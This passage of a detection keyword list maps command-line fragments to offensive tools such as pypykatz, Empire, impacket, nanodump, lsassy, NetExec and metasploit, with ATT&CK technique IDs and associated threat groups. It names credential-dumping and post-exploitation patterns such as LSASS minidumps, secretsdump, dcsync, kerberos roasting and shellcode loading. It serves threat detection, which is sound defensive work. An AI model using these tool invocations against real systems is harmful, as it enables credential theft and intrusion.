- T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi wifi*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos apreq *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos dump*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos purge*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos roast*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos sessions*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos tgt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos triage*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live lsa -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live lsa -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live process create -c regedit*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb client *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb dcsync *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb lsassdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb regdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb secretsdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi localgroup enum -t*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi session enum *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi share enum*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live users whoami*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* llmnr-resolve.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -LLMNRTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -llmnrtypes AAAA*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for 
penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* lltd-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --llvm-obfuscator * ,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -* LMHASH:NTHASH*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -LNKPath * -EncScript *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BackdoorLNK.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* load_extra_pots*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --load-dll *ssp.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* --load-shellcode *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* local class-instances SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local class-properties SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local grep *ccmsetup started *ccmsetup.log*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local query * FROM SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local secrets -m disk*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local secrets -m wmi*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* --local-auth --shares*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -LocalPoshC2ProjectDir *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -LocalPoshC2ProjectDir *,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -lockless -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --loggedon-users*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --lport 1337 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* LPORT=4444*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* lsa minidump * -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* lsa minidump *.dmp*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* lsa minidump *.dmp*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential 
Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-* lsa minidump /*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z
-* lsass.dmp*,offensive_tool_keyword,AD exploitation cheat sheet,Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* lsass_creds.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* lsassy -k -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-* lsassy*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z
-* lu-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-* -M dfscoerce *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M empire_exec -o LISTENER=http-listener*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M gpp_autologin*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M handlekatz *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M keepass_discover *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M keepass_discover*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -M keepass_trigger -o ACTION=ALL USER=*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-* -m lagentcmd *powershell *,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,0,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z
-* -M laps --kdcHost *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-* -M ldap-checker *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
